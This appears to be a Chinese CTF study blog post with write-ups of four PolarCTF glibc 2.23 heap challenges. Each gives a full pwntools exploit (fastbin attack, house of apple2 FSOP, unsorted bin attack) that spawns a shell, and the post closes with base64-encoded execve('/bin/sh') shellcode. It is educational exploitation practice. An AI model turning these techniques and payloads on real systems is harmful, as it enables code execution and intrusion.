24-08-06

本周学习总结

周报轻启,如画卷缓缓展,CTF四季更迭,尽藏其间。

岁月织锦,字字珠玑绘流年,一年光景,凝于尺素,诗意盎然,璀璨夺目。(by_AI)

全局常量声明:文章内容仅是由教程观点和自己总结获得,仅供参考。

一、[polarctf2024春季个人挑战赛]–tchunk

Glibc: 2.23-0ubuntu11.3_amd64

Check:

64位程序,保护全开。

Ida:

漏洞点:

存在无限堆溢出漏洞。

该程序为堆题,功能完善,不存在uaf的情况,通过连续的构造大小堆块来获得libc基地址和heap基地址,通过无限堆溢出漏洞来实现fastbinattack,修改_IO_list_all为堆地址,使用万能的house of apple2来实现gethsell。

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
from pwn import *
# from ctypes import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def raddr_A():
    return int(reu(b"-", True), 16)

def orw_rop64(pop_rdi, pop_rsi, pop_rdx, flag_addr, open_addr, read_addr, write_addr):
    orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
    orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(read_addr)
    orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(write_addr)

def getorw(name, buf, Arch):
    sh = shellcraft.open(name)
    sh += shellcraft.read(3, buf, 0x30)
    sh += shellcraft.write(1, buf, 0x30)
    sh = asm(sh, arch=Arch)
    return sh

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

# ==================== 程序连接配置 ====================

# p = remote("120.46.59.242", 2118)
p = process("./tchunk")

# ==================== ELF 和上下文配置 ====================

# elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# lib = cdll.LoadLibrary(None)
# p = process(["qemu-mipsel-static", "-g", "9999", "-L", "./", "./pwn"])
# p = process(["qemu-mipsel-static", "-L", "./", "./pwn"])

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'
# elf.arch, elf.so

# ==================== 功能函数定义 ====================

def add(name, size, content):
    sela(b"Please Choice!\n", stre(1))
    sela(b"Please give me a name for item:\n", name)
    sela(b"Size:\n", stre(size))
    sea(b"Emo!:\n", content)

def dele(index):
    sela(b"Please Choice!\n", stre(2))
    sela(b"Please Input index:\n", stre(index))

def show(index):
    sela(b"Please Choice!\n", stre(4))
    sela(b"Please Input index:\n", stre(index))

# ==================== 漏洞利用 ====================

# 步骤1: 分配chunk 0, 1, 2
add(b"0" * 0x8, 0x60, b"A" * 0x8)      # 0
add(b"1" * 0x8, 0x500, b"B" * 0x8)      # 1
add(b"2" * 0x8, 0x40, b"C" * 0x8)       # 2

# 步骤2: 释放chunk 1,触发unsorted bin
dele(1)

# 步骤3: 重新分配chunk 1和3
add(b"1" * 0x8, 0x510, b"B" * 0x8)      # 1
add(b"3" * 0x8, 0x500, b"D" * 0x10)     # 3

# 步骤4: 泄露heap地址
show(3)
reu(b"content:\n")
reu(b"DDDDDDDDDDDDDDDD")
heap_base = raddr64() - 0x10a0
ph(heap_base, "heap_base")

# 步骤5: 释放chunk 3,重新分配以泄露libc
dele(3)
add(b"3" * 0x8, 0x500, b"B")            # 3

show(3)
reu(b"content:\n")
libc_base = raddr64() - 0x3c4b42
ph(libc_base, "libc_base")

# 步骤6: 计算关键地址
IO_list_all = libc_base + libc.sym["_IO_list_all"]
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
sys_addr = libc_base + libc.sym['system']

# 步骤7: 构造FSOP payload
payload = p32(0xfffff7f5) + b";sh\x00" + p64(0x0)

fake_io_file = p64(0) * 2
fake_io_file += p64(0) + p64(1)           # _IO_write_base < _IO_write_ptr
fake_io_file += b"\x00" * 0x70 + p64(heap_base + 0x1c30)
fake_io_file += b"\x00" * 0x30 + p64(io_wfile_jumps)
fake_io_file += b"\x00" * (0x20 + 0xE0 + 0x50) + p64(heap_base + 0x1d80)
fake_io_file += b"\x00" * (0x8 + 0x10 + 0x68) + p64(sys_addr)

payload += fake_io_file

# 步骤8: 添加包含payload的chunk
add(b"4" * 0x8, 0x510, payload)         # 4

# 步骤9: Fastbin Attack - 修改fd指针指向_IO_list_all附近
dele(0)
add(b"A" * 0x18 + p64(0x71) + p64(IO_list_all - 0x23), 0x90, b"D" * 0x8)  # 5

# 步骤10: 分配两次,将chunk分配到_IO_list_all附近
add(b"6" * 0x8, 0x60, b"E" * 0x8)       # 6
add(b"7" * 0x8, 0x60, b"A" * 0x13 + p64(heap_base + 0x1b30))  # 7

# 步骤11: 触发FSOP
sela(b"Please Choice!\n", stre(5))

# 进入交互模式
op()

二、[polarctf2024夏季个人挑战赛]–one_heap

Glibc: 2.23-0ubuntu11.3_amd64

Check:

64位程序,保护全开。

Ida:

漏洞点1:

add函数中存在无限队溢出。

漏洞点2:

edit函数的编辑堆块功能固定为0x100

该程序为堆题,功能完善,不存在uaf的情况,通过edit功能我们可以构造堆堆叠来通过fastbinattack修改_IO_list_all为堆地址,采用神器house of apple2,因为无法编辑大堆块,可以精心申请堆块大小保证堆溢出足够,将house of apple2拆分后再拼起来。

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
from pwn import *

# from ctypes import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def raddr_A():
    return int(reu(b"-", True), 16)

def orw_rop64(pop_rdi, pop_rsi, pop_rdx, flag_addr, open_addr, read_addr, write_addr):
    orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
    orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(read_addr)
    orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(write_addr)
    return orw

def getorw(name, buf, Arch):
    sh = shellcraft.open(name)
    sh += shellcraft.read(3, buf, 0x30)
    sh += shellcraft.write(1, buf, 0x30)
    sh = asm(sh, arch=Arch)
    return sh

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

# 远程连接
p = remote("120.46.59.242", 2060)

# 本地调试选项(已注释)
# p = process("./heap")
# elf = ELF("./pwn")
libc = ELF("./libc.so.6")
# lib = cdll.LoadLibrary(None)

# QEMU MIPS 调试/运行(已注释)
# p = process(["qemu-mipsel-static", "-g", "9999", "-L", "./", "./pwn"])
# p = process(["qemu-mipsel-static", "-L", "./", "./pwn"])

# 调试与架构设置
# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'

def add(name, size, content):
    sela(b"Please Choice!\n", stre(1))
    sela(b"name:\n", name)
    sela(b"Size:\n", stre(size))
    sea(b"Emo!:\n", content)

def dele(index):
    sela(b"Please Choice!\n", stre(2))
    sela(b"Please Input index:\n", stre(index))

def edit(index, content):
    sela(b"Please Choice!\n", stre(3))
    sela(b"Please Input index:\n", stre(index))
    sea(b"Content\n", content)

def show(index):
    sela(b"Please Choice!\n", stre(4))
    sela(b"Please Input index:\n", stre(index))

# 漏洞利用流程
add(b"0" * 0x8, 0xA0, b"A" * 0x8)  # 0
add(b"1" * 0x8, 0x60, b"B" * 0x8)  # 1
add(b"2" * 0x8, 0xA0, b"C" * 0x8)  # 2
add(b"3" * 0x8, 0xA0, b"D" * 0x8)  # 3
add(b"4" * 0x8, 0xA0, b"E" * 0x8)  # 4
add(b"5" * 0x8, 0xA0, b"F" * 0x8)  # 5
add(b"6" * 0x8, 0x400, b"G" * 0x8)  # 6
add(b"7" * 0x8, 0x20, b"H" * 0x8)  # 7

dele(0)
edit(3, b"A" * 0xA0 + p64(0x280) + p64(0xB0))
dele(1)
dele(6)
dele(4)

add(b"0" * 0x8, 0x320, b"E")  # 0
add(b"1" * 0x8, 0xA0, b"B")  # 1

show(1)
reu(b"content:\n")
libc_base = raddr64() - 0x3c4f42
ph(libc_base, "libc_base")

IO_list_all = libc_base + libc.sym["_IO_list_all"]
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
sys_addr = libc_base + libc.sym['system']

edit(1, b"A" * 0x10)
show(1)
reu(b"A" * 0x10)
heap_base = raddr64() - 0x1410
ph(heap_base, "heap_base")

edit(0, b"A" * 0xA8 + p64(0x71) + p64(IO_list_all - 0x23) + p64(0))

add(b"4" * 0x8, 0x60, b"D" * 0x8)  # 4
add(b"6" * 0x8, 0x60, b"F" * 0x8)  # 6
edit(6, b"A" * 0x13 + p64(heap_base + 0x1040))

payload1 = p32(0xfffff7f5) + b";sh\x00" + p64(0x0)

fake_io_file = p64(0) * 2
fake_io_file += p64(0) + p64(1)
fake_io_file += b"\x00" * 0x70 + p64(heap_base + 0x1140)
fake_io_file += b"\x00" * 0x30 + p64(io_wfile_jumps)

fake_io_file2 = b"\x00" * (0x20 + 0xC0)
fake_io_file3 = b"\x00" * 0x70 + p64(heap_base + 0x1290) + p64(0)
fake_io_file4 = b"\x00" * (0x10 + 0x68) + p64(sys_addr)

payload1 += fake_io_file
payload2 = fake_io_file2
payload3 = fake_io_file3
payload4 = fake_io_file4

print("payload1: " + hex(len(payload1)))
print("payload2: " + hex(len(payload2)))
print("payload3: " + hex(len(payload3)))
print("payload4: " + hex(len(payload4)))

dele(0)
dele(7)

add(b"0" * 0x8, 0xD0, b"A" * 0x8)  # 0
add(b"7" * 0x8, 0xD0, b"H" * 0x8)  # 7
add(b"8" * 0x8, 0x70, b"I" * 0x8)  # 8
add(b"9" * 0x8, 0x70, b"J" * 0x8)  # 9

edit(0, payload1)
edit(7, payload2)
edit(8, payload3)
edit(9, payload4)

sela(b"Please Choice!\n", stre(5))
op()

三、[polarctf2023秋季个人挑战赛]–easychunk

Glibc: 2.23-0ubuntu11.3_amd64

Check:

64位程序,保护全开。

Ida:

漏洞点:

函数add中有非常明显的无限堆溢出。

该程序为堆题,功能完善,不存在uaf的情况,可以通过修改fastbin的fd指针尝试攻击IO(远程非常奇怪,就是加上realloc调栈,3个onegadget仍然不通,而2.23的free_hook谁用谁知道)。我直接懒说配听,

House of apple2启动!正好_IO_list_all-0x23也是有7f类标志,我们可以顺利利用fastbinattack。

这里要注意一点是2.23的IO结构有点不太一样,用gdb调试的时候多算一点偏移就行。

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
from pwn import *
# from ctypes import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def raddr_A():
    return int(reu(b"-", True), 16)

def orw_rop64(pop_rdi, pop_rsi, pop_rdx, flag_addr, open_addr, read_addr, write_addr):
    orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
    orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(read_addr)
    orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(write_addr)

def getorw(name, buf, Arch):
    sh = shellcraft.open(name)
    sh += shellcraft.read(3, buf, 0x30)
    sh += shellcraft.write(1, buf, 0x30)
    sh = asm(sh, arch=Arch)
    return sh

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

# ==================== 程序连接配置 ====================

p = remote("120.46.59.242", 2148)
# p = process("./heap")

# ==================== ELF 和上下文配置 ====================

# elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# lib = cdll.LoadLibrary(None)
# p = process(["qemu-mipsel-static", "-g", "9999", "-L", "./", "./pwn"])
# p = process(["qemu-mipsel-static", "-L", "./", "./pwn"])

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'
# elf.arch, elf.so

# ==================== 功能函数定义 ====================

def add(name, size, content):
    sela(b"Please Choice!\n", stre(1))
    sela(b"Please give me a name for item:\n", name)
    sela(b"Size:\n", stre(size))
    sea(b"Emo!:\n", content)

def dele(index):
    sela(b"Please Choice!\n", stre(2))
    sela(b"Please Input index:\n", stre(index))

def show(index):
    sela(b"Please Choice!\n", stre(4))
    sela(b"Please Input index:\n", stre(index))

# ==================== 漏洞利用 ====================

# 初始交互
sel(b"A")

# 步骤1: 分配chunk 0, 1, 2
add(b"0" * 0x8, 0x60, b"A" * 0x8)      # 0
add(b"1" * 0x8, 0x500, b"B" * 0x8)      # 1
add(b"2" * 0x8, 0x40, b"C" * 0x8)       # 2

# 步骤2: 释放chunk 1,触发unsorted bin
dele(1)

# 步骤3: 重新分配chunk 1和3
add(b"1" * 0x8, 0x510, b"B" * 0x8)      # 1
add(b"3" * 0x8, 0x500, b"D" * 0x10)     # 3

# 步骤4: 泄露heap地址
show(3)
reu(b"content:\n")
reu(b"DDDDDDDDDDDDDDDD")
heap_base = raddr64() - 0x10a0
ph(heap_base, "heap_base")

# 步骤5: 释放chunk 3,重新分配以泄露libc
dele(3)
add(b"3" * 0x8, 0x500, b"B")            # 3

show(3)
reu(b"content:\n")
libc_base = raddr64() - 0x3c4b42
ph(libc_base, "libc_base")

# 步骤6: 计算关键地址
IO_list_all = libc_base + libc.sym["_IO_list_all"]
io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
sys_addr = libc_base + libc.sym['system']

# 步骤7: 构造FSOP payload
payload = p32(0xfffff7f5) + b";sh\x00" + p64(0x0)

fake_io_file = p64(0) * 2
fake_io_file += p64(0) + p64(1)           # _IO_write_base < _IO_write_ptr
fake_io_file += b"\x00" * 0x70 + p64(heap_base + 0x1c30)
fake_io_file += b"\x00" * 0x30 + p64(io_wfile_jumps)
fake_io_file += b"\x00" * (0x20 + 0xE0 + 0x50) + p64(heap_base + 0x1d80)
fake_io_file += b"\x00" * (0x8 + 0x10 + 0x68) + p64(sys_addr)

payload += fake_io_file

# 步骤8: 添加包含payload的chunk
add(b"4" * 0x8, 0x510, payload)         # 4

# 步骤9: Fastbin Attack - 修改fd指针指向_IO_list_all附近
dele(0)
add(b"A" * 0x18 + p64(0x71) + p64(IO_list_all - 0x23), 0x90, b"D" * 0x8)  # 5

# 步骤10: 分配两次,将chunk分配到_IO_list_all附近
add(b"6" * 0x8, 0x60, b"E" * 0x8)       # 6
add(b"7" * 0x8, 0x60, b"A" * 0x13 + p64(heap_base + 0x1b30))  # 7

# 步骤11: 触发FSOP
sela(b"Please Choice!\n", stre(5))

# 进入交互模式
op()

四、[polarctf2023冬季个人挑战赛]–worker_note1

Glibc: 2.23-0ubuntu11.3_amd64

Check:

64位程序,保护全开。

Ida:

漏洞点1:

是的,你并不需要知道搞亮的那两句是什么意思,你只需要知道如果该堆块一旦进入了这个edit函数以后,与之相邻的下一个堆块的pre_size的最后一位会被清零。

漏洞点2:

选项5中我们可以获得pie的基地址,我们的目的是向位于bss段是的key中写入大于0x505的数据,我们可以用unsortbinattack轻松做到这一点(低libc版本)

door():

考虑到存在offbynull行为,又是低Glibc版本,我们可以使用堆堆叠,选择5获得pie基地址计算出key的地址,然后构造unsortbinattack向key写入一个大地址(好了现在我知道谁的地址最大了)。

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
from pwn import *

# from ctypes import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def raddr_A():
    return int(reu(b"-", True), 16)

def orw_rop64(pop_rdi, pop_rsi, pop_rdx, flag_addr, open_addr, read_addr, write_addr):
    orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
    orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(read_addr)
    orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x30)
    orw += p64(write_addr)
    return orw

def getorw(name, buf, Arch):
    sh = shellcraft.open(name)
    sh += shellcraft.read(3, buf, 0x30)
    sh += shellcraft.write(1, buf, 0x30)
    sh = asm(sh, arch=Arch)
    return sh

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

# 远程连接
p = remote("120.46.59.242", 2084)

# 本地调试选项(已注释)
# p = process("./pwn")
# elf = ELF("./pwn")
# libc = ELF("./libc.so.6")
# lib = cdll.LoadLibrary(None)

# QEMU MIPS 调试/运行(已注释)
# p = process(["qemu-mipsel-static", "-g", "9999", "-L", "./", "./pwn"])
# p = process(["qemu-mipsel-static", "-L", "./", "./pwn"])

# 调试与架构设置
# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'

def add(size, content):
    sela(b"Choice!\n", stre(1))
    sela(b"Size:\n", stre(size))
    sea(b"worker:\n", content)

def dele(index):
    sela(b"Choice!\n", stre(2))
    sela(b"index:\n", stre(index))

def edit(index, content):
    sela(b"Choice!\n", stre(3))
    sela(b"index:\n", stre(index))
    sea(b"Content\n \x1B[0m", content)

def show(index):
    sela(b"Choice!\n", stre(4))
    sela(b"index:\n", stre(index))

# 漏洞利用流程
add(0x500, b"A" * 0x8)   # 0
add(0x508, b"B" * 0x8)   # 1
add(0x500, b"C" * 0x8)   # 2
add(0x500, b"D" * 0x8)   # 4

dele(0)
edit(1, b"A" * 0x500 + p64(0xa20))
dele(2)
add(0x500, b"A" * 0x8)   # 0

show(0)
reu(b"AAAAAAAA")
libc_base = raddr64() - 0x3c5188
ph(libc_base, "libc_base")

fix_addr = libc_base + 0x3c4b78

sela(b"Choice!\n", stre(5))
reu(b"globals:")
pie_addr = raddr_T() - 0x202060
ph(pie_addr, "pie_addr")

key_addr = pie_addr + 0x202068
edit(1, p64(fix_addr) + p64(key_addr - 0x10))
add(0xa10, b"C" * 0x8)   # 2

sela(b"Choice!\n", stre(5))
rel()
op()

下周学习计划

| 应该要做的事情 |

我tm学学学学学学学学学学学学学学学学学学学学学

Ciallo~(∠・ω< )⌒★ !!!

学习感受

唻啝莪①起荿潙pwn哋鉲滵妑!

ICAgIG1vdiByYngsIDB4MDA2ODczMmY2ZTY5NjIyZgogICAgcHVzaCByYngKICAgIG1vdiByZGkscnNwCiAgICBtb3YgcnNpLDAKICAgIG1vdiByZHgsMAogICAgbW92IHJheCw1OQogICAgc3lzY2FsbA==

#CTF #PWN
24-08-06
https://zlsf-zl.github.io/2024/08/06/8-6-8-11/
作者
ZLSF
发布于
2024年8月6日
许可协议